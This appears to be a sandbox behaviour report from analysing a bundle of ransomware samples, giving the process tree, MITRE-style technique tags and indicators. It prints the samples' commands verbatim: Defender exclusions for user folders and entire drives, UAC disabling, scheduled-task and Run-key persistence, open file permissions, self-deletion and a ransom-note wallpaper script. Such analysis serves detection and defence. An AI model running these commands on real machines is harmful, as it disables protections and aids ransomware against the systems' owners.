PID 3708 wrote to memory of 4724	3708	cmd.exe	113
PID 3708 wrote to memory of 4724	3708	cmd.exe	113
PID 3256 wrote to memory of 2680	3256	cmd.exe	115
PID 3256 wrote to memory of 2680	3256	cmd.exe	115
PID 3708 wrote to memory of 4744	3708	cmd.exe	117
PID 3708 wrote to memory of 4744	3708	cmd.exe	117
PID 3708 wrote to memory of 4744	3708	cmd.exe	117
PID 4744 wrote to memory of 6916	4744	HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe	120
PID 4744 wrote to memory of 6916	4744	HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe	120
PID 4744 wrote to memory of 6916	4744	HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe	120
PID 4372 wrote to memory of 7124	4372	HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe	121
PID 4372 wrote to memory of 7124	4372	HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe	121
PID 3256 wrote to memory of 3620	3256	cmd.exe	123
PID 3256 wrote to memory of 3620	3256	cmd.exe	123
PID 7124 wrote to memory of 224	7124	cmd.exe	124
PID 7124 wrote to memory of 224	7124	cmd.exe	124
PID 3256 wrote to memory of 5180	3256	cmd.exe	125
PID 3256 wrote to memory of 5180	3256	cmd.exe	125
PID 3256 wrote to memory of 5344	3256	cmd.exe	126
PID 3256 wrote to memory of 5344	3256	cmd.exe	126
PID 6916 wrote to memory of 5472	6916	powershell.exe	127
PID 6916 wrote to memory of 5472	6916	powershell.exe	127
PID 6916 wrote to memory of 5472	6916	powershell.exe	127
PID 6916 wrote to memory of 5520	6916	powershell.exe	128
PID 6916 wrote to memory of 5520	6916	powershell.exe	128
PID 6916 wrote to memory of 5520	6916	powershell.exe	128
PID 3188 wrote to memory of 5616	3188	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe	129
PID 3188 wrote to memory of 5616	3188	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe	129
PID 5616 wrote to memory of 5672	5616	cmd.exe	132
PID 5616 wrote to memory of 5672	5616	cmd.exe	132
PID 3708 wrote to memory of 5656	3708	cmd.exe	131
PID 3708 wrote to memory of 5656	3708	cmd.exe	131
PID 3708 wrote to memory of 5656	3708	cmd.exe	131
PID 5672 wrote to memory of 5764	5672	svchost32.exe	293
PID 5672 wrote to memory of 5764	5672	svchost32.exe	293
PID 3708 wrote to memory of 5772	3708	cmd.exe	547
PID 3708 wrote to memory of 5772	3708	cmd.exe	547
PID 3708 wrote to memory of 5772	3708	cmd.exe	547
PID 5656 wrote to memory of 5844	5656	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe	136
PID 5656 wrote to memory of 5844	5656	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe	136
PID 5656 wrote to memory of 5844	5656	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe	136
PID 5764 wrote to memory of 5868	5764	cmd.exe	138
PID 5764 wrote to memory of 5868	5764	cmd.exe	138
PID 3708 wrote to memory of 5864	3708	cmd.exe	137
PID 3708 wrote to memory of 5864	3708	cmd.exe	137
PID 3708 wrote to memory of 5864	3708	cmd.exe	137
PID 5656 wrote to memory of 5880	5656	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe	139
PID 5656 wrote to memory of 5880	5656	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe	139

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8656	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z
1⤵
- Modifies registry class
PID:2340

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1492

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3756

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3124
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3436
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 804
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:4036
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
    3⤵
    - Executes dropped EXE
    PID:2016
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress & exit
      4⤵
      PID:9120
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe & exit
      4⤵
      PID:8740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10128
  - - C:\Windows\System32\ipconfig.exe
      "C:\Windows\System32\ipconfig.exe" flushdns
      4⤵
      Gathers network information
      PID:10132
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /delete /tn Service /f
      4⤵
      PID:9240
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /sc minute /mo 10 /tn Service /tr "C:\Windows\system32\Holocryptic\Crossbarre.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9476
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      /Processid:{0a52d887-c53b-4a50-a125-d38c5aaa675f}
      4⤵
      PID:9260
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3188
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5344
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5616
    - - C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5672
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5764
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5868
      - C:\Windows\system32\services32.exe
        
        "C:\Windows\system32\services32.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
        
        C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        7⤵
        
        PID:7060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5180
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        7⤵
        
        PID:8848
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        8⤵
        
        PID:9360
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        9⤵
        
        PID:10236
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2880
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        9⤵
        
        PID:6852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        9⤵
        
        PID:3016
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        10⤵
        
        PID:1064
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        6⤵
        
        PID:1432
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:4924
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
    HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00484\uninstall.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:7124
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Run /V "svchosted" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\svchosted
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:224
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Roaming" /grant Everyone:(OI)(CI)F /T
        5⤵
        Modifies file permissions
        
        PID:4232
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
    HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4724
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
    HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:6916
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\696116166.png /f
        5⤵
        Sets desktop wallpaper using registry
        System Location Discovery: System Language Discovery
        
        PID:5472
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5520
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
    HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:5656
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5844
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1020
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup
      4⤵
      System Location Discovery: System Language Discovery
      PID:5880
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:3684
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming
      4⤵
      System Location Discovery: System Language Discovery
      PID:5900
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin
      4⤵
      System Location Discovery: System Language Discovery
      PID:5920
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6872
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop
      4⤵
      System Location Discovery: System Language Discovery
      PID:5928
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Links
      4⤵
      System Location Discovery: System Language Discovery
      PID:5944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Links
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:6952
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Contacts
      4⤵
      System Location Discovery: System Language Discovery
      PID:5952
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Contacts
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents
      4⤵
      System Location Discovery: System Language Discovery
      PID:5960
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:2992
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures
      4⤵
      System Location Discovery: System Language Discovery
      PID:5968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Music
      4⤵
      System Location Discovery: System Language Discovery
      PID:5976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Music
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1620
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\OneDrive
      4⤵
      System Location Discovery: System Language Discovery
      PID:5984
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\OneDrive
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4080
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Favorites
      4⤵
      System Location Discovery: System Language Discovery
      PID:5992
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Favorites
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:3144
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Searches
      4⤵
      System Location Discovery: System Language Discovery
      PID:6000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Searches
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3300
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Videos
      4⤵
      System Location Discovery: System Language Discovery
      PID:6008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Videos
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6888
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads
      4⤵
      System Location Discovery: System Language Discovery
      PID:6016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7104
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6024
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:760
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "D:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "D:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1272
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "E:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6040
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "E:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:7008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "F:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6048
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "F:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1700
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "G:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "G:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:6976
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "H:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6064
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "H:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:6964
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "Z:\
      4⤵
      System Location Discovery: System Language Discovery
      PID:6072
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "Z:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1056
  - - C:\Windows\SysWOW64\cmd.exe
